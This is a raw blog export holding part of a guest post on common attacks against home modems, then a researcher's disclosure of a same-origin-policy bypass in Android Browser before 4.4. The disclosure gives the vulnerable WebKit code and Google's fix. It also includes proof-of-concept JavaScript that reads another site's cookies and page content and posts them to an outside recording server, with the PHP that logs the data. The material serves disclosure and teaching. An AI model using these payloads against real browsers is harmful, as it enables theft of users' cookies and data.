<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" QFormat="true"
Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" QFormat="true"
Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" QFormat="true"
Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" QFormat="true"
Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" SemiHidden="true"
UnhideWhenUsed="true" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="TOC Heading"/>
<w:LsdException Locked="false" Priority="41" Name="Plain Table 1"/>
<w:LsdException Locked="false" Priority="42" Name="Plain Table 2"/>
<w:LsdException Locked="false" Priority="43" Name="Plain Table 3"/>
<w:LsdException Locked="false" Priority="44" Name="Plain Table 4"/>
<w:LsdException Locked="false" Priority="45" Name="Plain Table 5"/>
<w:LsdException Locked="false" Priority="40" Name="Grid Table Light"/>
<w:LsdException Locked="false" Priority="46" Name="Grid Table 1 Light"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark"/>
<w:LsdException Locked="false" Priority="51" Name="Grid Table 6 Colorful"/>
<w:LsdException Locked="false" Priority="52" Name="Grid Table 7 Colorful"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 1"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 1"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 1"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 1"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 1"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 2"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 2"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 2"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 2"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 2"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 3"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 3"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 3"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 3"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 3"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 4"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 4"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 4"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 4"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 4"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 5"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 5"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 5"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 5"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 5"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 6"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 6"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 6"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 6"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 6"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="46" Name="List Table 1 Light"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark"/>
<w:LsdException Locked="false" Priority="51" Name="List Table 6 Colorful"/>
<w:LsdException Locked="false" Priority="52" Name="List Table 7 Colorful"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 1"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 1"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 1"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 1"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 1"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 2"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 2"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 2"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 2"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 2"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 3"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 3"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 3"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 3"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 3"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 4"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 4"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 4"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 4"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 4"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 5"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 5"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 5"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 5"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 5"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 6"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 6"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 6"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 6"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 6"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 6"/>
</w:LatentStyles>
</xml><![endif]--><!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-parent:"";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin-top:0in;
mso-para-margin-right:0in;
mso-para-margin-bottom:10.0pt;
mso-para-margin-left:0in;
line-height:115%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;}
</style>
<![endif]-->
</div>
<div class="MsoNormal">
These two are two of the most common flaws in the history of
web security. Mmost ZTE modems do not use anti-XSRF tokens (Used to prevent CSRF Attacks) on any sensitive request.<br />
<br /></div>
<div class="MsoNormal">
XSS is even more worsed because if one found an XSS flaw in any modem (which
is likely), he can send that link to a logged in administrator and perform any
action in behalf of the admin, this could be done by stealing the XSRF-Token. Also, an XSS could also allow session hijacking and other browser attacks.</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
XSRF flaws are more commonly found in modems as opposed to xss due to the fact that
modems use <a href="http://pwntoken.wordpress.com/2014/12/07/required-http-security-inspection-on-application-security/" target="_blank">HTTP</a> authentications most of the time. So Headers are mainly used in communications
protocols to communicate with one another. This makes it harder for the modem to
detect and create anti-csrf tokens other than to compare it. <br />
<br /></div>
<div class="MsoNormal">
Because of these or just because of careless developing it
is sometimes possible in to tricking admins changing passwords, issuing
commands or easing access. </div>
<div class="MsoNormal">
<br /></div>
<h4 class="MsoNormal" style="text-align: left;">
0x06: Social Engineering</h4>
<div class="MsoNormal" style="text-align: left;">
What would you say if a blocked number called you and told you that she is from your ISP and she needs your credentials in order to add/maintain the new and revised 3G technology into your modem. Or even she asks you to maintain security flaws in your modem? You surly never expect this to be a troll. I mean, why would you? And then next thing you know, she snooped your configuration password. Knowing this password could mean (since lots of people use same passwords) that she got access to email password, financial account, etc. </div>
<div class="MsoNormal" style="text-align: left;">
<br /></div>
<h4 class="MsoNormal" style="text-align: left;">
0x07: Exploit Databases</h4>
<div class="MsoNormal" style="text-align: left;">
Many Exploit databases hold juicy info about modems. Including default configurations, XSRF/XSS/LFI flaws, logical issues, backdoors. So all you need to do is to find the modem version and give a search on exploit databases such as exploit-db.com, 1337day.com etc<br />
<br />
So say, in case you found an exploit against a previous version of a modem, however not for the exact version. This necessary doesn't mean yours isn’t vulnerable to the particular exploit you found. Infact most vendors use same architecture to construct the web architecture of their modems. So one XSS on one model could mean XSS on all other vendor modems.</div>
<h4 class="MsoNormal" style="text-align: left;">
0x08: Eavesdropping</h4>
<div class="MsoNormal" style="text-align: left;">
The lack of SSL usually means bad luck for modems. Especially if it’s for office/public usage because the admin is always in risk of accessing any file from the modem. The reason being, that it is very easy to sniff ongoing traffic with with tools like Wireshark.<br />
<br />
The fact that modems use login protocols like HTTP authentication puts them in more danger because when requesting any file, the modem should request the authentication header and the admin responds in (mostly Base64 form), and an attack easily can sniff this and decode the communication easily it.<br />
<br />
Even when using SSL (note very few modems use it), it can still be insecure and even pose more risk. Recently, A lot of attacks have been identified against SSL protocols Heartbleed, POODLE to name a few. </div>
<h4 class="MsoNormal" style="text-align: left;">
0x09: Denial Of Service</h4>
<div class="MsoNormal" style="text-align: left;">
Denial of Service is one of the most annoying things I can think of next to a Log out CSRF. People with bad intentions can use this type of attack to knock a modem out of delivering internet and sometimes even let the modem reset itself. <br />
<br />
This is really crazy for people trying to do their job. The fact this attack can easily be turned an untraceable attack can make your business day a big pain just because you choose to use a vulnerable modem.<br />
<br />
Most modems by design don’t hold more HDD than 25MB and less than 2MB ram with no DOS protections. This usually means they can handle limited amount of data with huge amount of time. All an attacker has to do is send more requests than the modem can handle and hence exhausting it's memory and resulting in a DOS.<br />
<b><br /></b>
<b>0x10: Lack Of Updates</b><br />
<br />
Modem users seldom receive updates for modems in case a critical vulnerabilities have been identified in the wild, and a lot of them don't really have a mechanism for providing OTA (Over the Air) updates. A lot of times, users manually have to upgrade the firmware and ofcourse which is not possible for people having lack or no technical knowledge. </div>
<h4 class="MsoNormal" style="text-align: left;">
0xA: Suggestions</h4>
<ol style="text-align: left;">
<li>If you are an admin/user of a modem, Try not to stay logged in to make attacks like XSRF,XSS and ClickJacking less effective. .</li>
<li>Try doing a little research about the modem model you are trying to buy. Google exploits for it, try to search if it uses secure connection (TLS), if it is vulnerable, why should you. Look for another.</li>
<li>Try disabling remote access to decrease the attacker’s possibility of gaining access over the internet; since most of the modem exploits require LAN access, it’s a good thing to disable Telnet, web and even ftp access to modem remotely.</li>
<li>Limit Physical Access. Because, most modems have a physical hard reset key/button, it should be noted most of them should remain in a secured environment where only authorized people can reach.</li>
</ol>
<h4 style="text-align: left;">
About the Author:</h4>
<div id="stcpDiv" style="left: -1988px; position: absolute; top: -1999px;">
This
following article is a guest post by Paulos Yibelo. Yibelo is the
newest member of RHA family. He is a full time PHP coder and most of his
research is involved with application security. In his free time he
loves writing articles related to application security
http://paulosyibelo.blogspot.com/. - See more at:
http://www.rafayhackingarticles.net/2014/09/indepth-code-execution-in-php-part-two.html#sthash.b5OotKP6.dpuf</div>
<div style="text-align: left;">
This following article is a guest post by Paulos Yibelo. Yibelo is the newest member of RHA family. He is a full time PHP coder and most of his research is involved with application security. In his free time he loves writing articles related to application security <a href="http://paulosyibelo.blogspot.com/" rel="nofollow" target="_blank">http://paulosyibelo.blogspot.com/</a></div>
<div style="text-align: left;">
</div>
</div>
<script>
location.href="http://www.rafaybaloch.com/2017/06/common-attacks-against-modems.html";
</script>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3121270199089759062.post-27666339384440322052014-10-02T04:53:00.000-07:002020-05-27T14:34:43.558-07:00A Tale Of Another SOP Bypass In Android Browser < 4.4<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfvgyfHGKRcenjfnCPhmNBDkYB3CJcBfVh2_pittlG_KS-OfLxsnewYKauYxHfVLwPibMrZgUKimwRCFZnotrLLyQRirKhn-R6cDDkxpRIeBjCsNIAsstm93S43xUuo6OEO1dAAWKoMmM/s1600/Pirate.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfvgyfHGKRcenjfnCPhmNBDkYB3CJcBfVh2_pittlG_KS-OfLxsnewYKauYxHfVLwPibMrZgUKimwRCFZnotrLLyQRirKhn-R6cDDkxpRIeBjCsNIAsstm93S43xUuo6OEO1dAAWKoMmM/s1600/Pirate.jpg" /></a></div>
<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
Since, my recent <a href="http://www.rafayhackingarticles.net/2014/08/android-browser-same-origin-policy.html" rel="nofollow" target="_blank">android SOP bypass [CVE-2014-6041]</a> triggered a lot of eruption among the infosec community, I was motivated to research a bit more upon the android browser, it turns out that things are much worse than I thought, I managed to trigger quite a few interesting vulnerabilities inside of Android browser, one of them being another Same Origin Policy Bypass vulnerability. The thing that makes it worse was the same SOP bypass was already <a href="http://trac.webkit.org/changeset/96826" rel="nofollow" target="_blank">fixed</a> inside of chrome years ago, however the patches were not applied to Android browser < 4.4.<br />
<a name='more'></a><br />
<h4>
Proof Of Concept</h4>
The following is the proof of concept:<br />
<br />
<script><br />
window.onload = function()<br />
{<br />
object = document.createElement("object"); <br />
object.setAttribute("data", "http://www.bing.com");<br />
document.body.appendChild(object);<br />
object.onload = function() {<br />
object.setAttribute("data", "javascript:alert(document.domain)");<br />
object.innerHTML = "foobar";<br />
}<br />
}<br />
<div>
</script></div>
<div>
<br /></div>
<div>
<br />
The POC is very easy to understand for individuals having some javaScript background. However, for others let me break it down for you. The above code creates an object with data attribute, which loads up a URL from another origin in this case "<b>http://www.bing.com</b>", however once it's loaded, we replace bing.com with "javascript:alert(document.domain)". The interesting thing here is that the last line is essential for the POC to work <b>object.innerHTML = "foobar"; </b>so that the navigation request is performed<br />
<br />
Let's take a look at the vulnerable code that is responsible for the causing the issue:<br />
<h4>
Vulnerable Code</h4>
bool HTMLPlugInImageElement::allowedToLoadFrameURL(const String& url)<br />
{<br />
ASSERT(document());<br />
ASSERT(document()->frame());<br />
if (document()->frame()->page()->frameCount() >= Page::maxNumberOfFrames)<br />
return false;<br />
<b><u><span style="color: red;">KURL completeURL = document()->completeURL(url);</span></u></b><br />
<br />
<br />
The above function is responsible for loading up the frame URL, if you take a close look at the code, you would find out that there is no validation for javascript scheme, which allows us to execute javaScript in context of the frame that was loaded.<br />
<h4>
The fix</h4>
The issue was <a href="https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef%5E%21/#F0" rel="nofollow" target="_blank">fixed </a>by applying the following checks from <b>securityorigin.h</b> library. <br />
<br />
if (contentFrame() &&<span style="color: red;"> protocolIsJavaScript(completeURL)</span><br />
&& !document()->securityOrigin()->canAccess(contentDocument()->securityOrigin()))<br />
return false;<br />
<h4>
Proof Of Concept Using Postmessage Call</h4>
To help understand the vulnerability better and get to the root cause, i contacted Joe Vennix from metasploit team, who modified my original POC to the following to help demonstrate the vulnerability in an effective manner. The following POC uses postMessage call from HTML 5 world to send the document.cookie and innerHTML to the main window.<br />
<br />
<script><br />
window.onload = function()<br />
{<br />
object = document.createElement("object");<br />
object.setAttribute("data", "http://www.bing.com");<br />
document.body.appendChild(object);<br />
object.onload = function() {<br />
object.data = "javascript:var t=top;with(document)t.postMessage('HTML='+body.innerHTML+'&COOKIE='+cookie,'*');";<br />
object.innerHTML = "foobar";<br />
}<br />
}<br />
<br />
window.onmessage = function(m){<br />
alert(m.data);<br />
}<br />
</script><br />
<br />
<h4>
Proof Of Concept To Steal Data Across Domains</h4>
A great friend of mine @filedescriptor helped me with the following POC, which steals data from bing.com by accessing the document.body.innerHTML property as submits that data cross origin by using a POST request, since you can send limited amount of data with GET due to browser restrictions.<br />
<br />
<script><br />
window.onload = function()<br />
{<br />
object = document.createElement("object");<br />
object.setAttribute("data", "http://www.bing.com");<br />
document.body.appendChild(object);<br />
object.onload = function() {<br />
object.data = "javascript:with(document)body.innerHTML+='<form method=post action=//kcal.pw/record.php?name=__target=_><input name=content></form><iframe name=_>',__.content.value=body.innerHTML,__.submit()";<br />
object.innerHTML = "foobar";<br />
}<br />
}</div>
<div>
<br />
The PHP file hosted at record.php contains the following line, which saves the data coming from bing.com to a file called record.txt.<br />
<b><br /></b>
<b>file_put_contents('record.txt', $_POST['content']);</b><br />
<br />
The following are some of the handsets that we used to test and verify this vulnerability.<br />
<h4>
Sony Xperia</h4>
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj70rg_CkjdPfY70O4IKePszLFstMCp78P7yiGBygwIJ84xLvi1DPBxKvZsrm89Ufkc8znNJNKAE5sSKnm9uQMxUNwOiX5PbonJfm6rHMCFJyXoJJjBa9I8SVdpNxw9LRayPSV8Oxtipvg/s1600/SONY.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj70rg_CkjdPfY70O4IKePszLFstMCp78P7yiGBygwIJ84xLvi1DPBxKvZsrm89Ufkc8znNJNKAE5sSKnm9uQMxUNwOiX5PbonJfm6rHMCFJyXoJJjBa9I8SVdpNxw9LRayPSV8Oxtipvg/s1600/SONY.png" height="640" width="364" /></a></div>
<h4>
LGNexus4</h4>
<br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijoY6u5eDaoopqbnAdZJD8crVPKhS8nWQu4R0oTXNuxe4oZ1D617ckmw2dubdaRBANED5HReHoPunPmeMZFEAYyJxABrmye9zBNDhnuAX5MLBe8GGHwMyfxveZCVxsNb8cvgJcp_Rxqjk/s1600/LGNEXUS.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijoY6u5eDaoopqbnAdZJD8crVPKhS8nWQu4R0oTXNuxe4oZ1D617ckmw2dubdaRBANED5HReHoPunPmeMZFEAYyJxABrmye9zBNDhnuAX5MLBe8GGHwMyfxveZCVxsNb8cvgJcp_Rxqjk/s1600/LGNEXUS.png" height="640" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<h4>
Samsung Galaxy S3</h4>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_L_-QcSBjU6AP3gZW0baC9C0ASrqJLWyVF_QDCKHQ2DDtiFC6aciTXPAJZx2O5HbRoKpw5GwJuq87nLWaVFsQ3J6RYhyPU4HLLA43TlrRa2pIWhkyLfjrY50cw3OQGY29UEXeN287S90/s1600/samsung+galaxy+s3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_L_-QcSBjU6AP3gZW0baC9C0ASrqJLWyVF_QDCKHQ2DDtiFC6aciTXPAJZx2O5HbRoKpw5GwJuq87nLWaVFsQ3J6RYhyPU4HLLA43TlrRa2pIWhkyLfjrY50cw3OQGY29UEXeN287S90/s1600/samsung+galaxy+s3.png" height="640" width="322" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<h4>
Safari Browser 5.0</h4>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcV6k9DGdDHsG8gH_S0I4a_1TYNhm7xJCFEHMZI-6sJVPZn0zNFMnulQolN42Bia1ep6bdWuX_9NcC6tQ_h5V0Q72RwX1XxIs__hmXESRfIYn5dYo9Ioe10VcHGlDLNg7xQnLRDdabfWU/s1600/safari+5.0.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcV6k9DGdDHsG8gH_S0I4a_1TYNhm7xJCFEHMZI-6sJVPZn0zNFMnulQolN42Bia1ep6bdWuX_9NcC6tQ_h5V0Q72RwX1XxIs__hmXESRfIYn5dYo9Ioe10VcHGlDLNg7xQnLRDdabfWU/s1600/safari+5.0.png" height="348" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<h4>
Google's Response</h4>
The vulnerability was responsibly disclosed to Google on 9/25/2014, The vulnerability was fixed on 10/1/2014 and the patches have been released <a href="https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef" rel="nofollow" target="_blank">here</a>.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7p6DqDTZg3q_RF3DpDSNdNd1qnmInbUtBuwiqdK52nn_wKCXiXE2-_m75bcgroD-5CQ2nsjbx4LoS-xMEKdPItiwyL67U6PLAovTIwm5PotklmXFAXf9VMXhWdSZT67eRurqXtMrehec/s1600/jb.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7p6DqDTZg3q_RF3DpDSNdNd1qnmInbUtBuwiqdK52nn_wKCXiXE2-_m75bcgroD-5CQ2nsjbx4LoS-xMEKdPItiwyL67U6PLAovTIwm5PotklmXFAXf9VMXhWdSZT67eRurqXtMrehec/s1600/jb.png" height="137" width="577" /></a></div>
</div>
</div>
<h4>
In Closing</h4>
<div>
There are tons of other browsers with huge userbase that are vulnerable to same vulnerability, Maxthon, CM Browser, Safari Browser 5.0 to name a few. In case if you are still using Android browser or any of other browser, you should immediately apply patches or switch to Chrome or firefox. I believe there are several other vulnerabilities that were addresses in chrome webkit and still have not been addressed inside of Android browser, therefore it is recommended to avoid it completely.<br />
<br />
<b><br /></b>
<b>Press Coverage</b><br />
<br />
http://news.yahoo.com/half-android-phones-still-vulnerable-massive-privacy-bug-135551464.html<br />
<br />
http://www.redmondpie.com/massive-privacy-bug-affects-many-android-devices-heres-how-to-protect-yourself/<br />
<br />
http://threatpost.com/second-same-origin-policy-bypass-flaw-haunts-android-browser<br />
<br />
http://www.securityweek.com/google-patches-second-same-origin-policy-bypass-flaw-android-browser<br />
<br />
http://www.pcworld.com/article/2823012/almost-half-of-android-devices-still-have-a-vulnerable-browser-installed.html<br />
<br />
http://www.csoonline.com/article/2690910/application-security/android-browser-flaw-found-to-leak-data.html<br />
<br />
http://tribune.com.pk/story/771546/on-a-roll-another-bug-exposed-by-pakistani-researcher/<br />
<br />
https://blog.lookout.com/blog/2014/10/06/aosp-browser-vuln/<br />
<br />
http://www.net-security.org/secworld.php?id=17459<br />
<br />
http://www.zdnet.com/half-of-all-android-devices-still-vulnerable-to-privacy-disaster-browser-bug-7000034500/<br />
<br />
http://www.cio.com.au/article/556967/almost-half-android-devices-still-vulnerable-browser-installed/?fp=16&fpid=1<br />
<br />
